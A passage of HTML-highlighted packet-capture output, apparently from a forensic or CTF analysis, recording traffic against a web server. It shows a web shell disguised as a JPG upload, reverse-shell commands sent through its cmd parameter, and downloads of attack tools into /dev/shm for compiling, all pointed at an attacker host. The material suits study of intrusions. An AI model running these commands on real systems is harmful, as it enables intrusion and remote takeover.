style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">image<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">pwncat<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">jpg<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">php<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">'<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">upload<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">success<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">br<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">a<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">href<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"http:\/\/112.0.1.12:8088\/\"<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">back<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">a<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">hr<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">small<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">html<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">No<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Time<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Source<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">                <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Destination<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Length<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Info<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">      <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">10.000890212<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">92.117.32.15<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">             <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">112.0.1.12<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">        <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">459<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">GET<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">upload<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">images<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">pwncat<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">jpg<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">?<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cmd<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">22<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">ncat<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">2010.0.2.15<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">202222<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">e<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">bin<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">bash<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">22<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">Hypertext<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Transfer<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">GET<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">upload<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">images<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">pwncat<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">jpg<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">php<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">?<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cmd<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">22<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">ncat<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">2092.117.32.15<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">202222<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">e<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">bin<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">bash<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">22<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.1<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">r<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Full<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">request<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">URI<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">http<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/112.0.1.12:8080\/upload\/images\/pwncat.jpg.php?cmd=%22ncat%2092.117.32.15%202222%20-e%20\/bin\/bash%22]<\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">request<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">No<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Time<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Source<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">                <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Destination<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Length<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Info<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">      <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">4<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">38.122022330<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">   <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">92.117.32.15<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">             <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">112.0.1.12<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">              <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">TCP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">      <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">135<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">80<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\u2192<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">59642<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">PSH<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">ACK<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Seq<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Ack<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Win<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">64240<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Len<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">81<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">Hypertext<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Transfer<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">wget<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">92.117.32.15<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8000<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">tools<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cat<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">c<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">O<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">dev<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">shm<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cat<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">c<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&amp;&amp;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">wget<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">10.0.2.15<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8000<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">bin<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">enc<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">O<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">dev<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">shm<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">enc<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&amp;&amp;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">gcc<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">dev<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">shm<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cat<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">c<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">pthread<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">        <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Expert<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Info<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Warning<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Illegal<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">characters<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">found<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">in<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">header<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">name<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">            <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Illegal<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">characters<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">found<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">in<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">header<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">name<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">            <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Severity<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">level<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Warning<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">            <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Group<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">No<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Time<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Source<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">                <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Destination<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Length<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Info<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">79.550917943<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">   <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">92.117.32.15<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">             <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">112.0.1.12<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">              <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">TCP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">      <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">127<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">80<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\u2192<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">59642<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">PSH<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">ACK<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Seq<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">177<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Ack<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Win<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">64240<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Len<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">73<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">Hypertext<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Transfer<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">wget<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">92.117.32.15<\/span><span class=\"o\" style=\"background: #263238;color: 